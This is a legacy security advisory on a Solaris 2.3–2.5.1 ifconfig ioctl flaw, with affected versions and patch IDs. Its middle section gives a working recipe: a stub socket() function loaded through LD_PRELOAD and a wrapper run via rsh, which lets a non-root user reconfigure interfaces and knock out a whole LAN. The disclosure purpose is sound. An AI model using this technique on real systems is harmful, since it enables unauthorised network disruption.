COMMAND

    ifconfig ioctls

SYSTEMS AFFECTED

    Sun OS 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, 5.4, 5.4_x86, 5.3

PROBLEM

    The command ifconfig assigns  addresses to network interfaces  and
    configures network  interface parameters.  The use  of ifconfig to
    configure   network   interface   parameters   is   restricted  to
    superusers.   This  vulnerability,  if  exploited, allows non-root
    attackers  to   use  ifconfig   to  configure   network  interface
    parameters for any network interface on a system.

    Following info is based om Alan Cox post. Firstly you want this
    little bit of code  for Solaris 2.5.1:

        cc haccident.c -c

        int socket(int fa, int type, int proto)
        {
                return 0;
        }

        mv haccident ~myusername

        cat >~myusername/myfconfig
        #!/bin/sh
        export LD_PRELOAD=$HOME/haccident.o
        ifconfig $*

        chmod 755 myfconfig

    Now you can do "rsh localhost ./myfconfig whatever" to do ifconfig
    commands as an ordinary user. Ok so its simple boring single  host
    denial of service.  Well actually its not...

    It's amazing  the fun  that occurs if you  add every  host on your
    class C network  to the lan  for example. Over  the next 10  to 15
    minutes your  entire lan  collapses into  a heap.  All you need is
    one user account on one  solaris 2.5.x box and the  entire network
    is a sitting duck.  The user doesn't even  need to break to  root,
    just any old shell account and blam....

SOLUTION

    The vulnerability is fixed in  Solaris 2.6.  The vulnerability  in
    ifconfig ioctls is fixed by the following patches:

        OS version          Patch ID
        __________          ________
        SunOS 5.5.1         103640-09
        SunOS 5.5.1_x86     103641-09
        SunOS 5.5           103093-14
        SunOS 5.5_x86       103094-11
        SunOS 5.4           101945-50
        SunOS 5.4_x86       101946-44
        SunOS 5.3           101318-87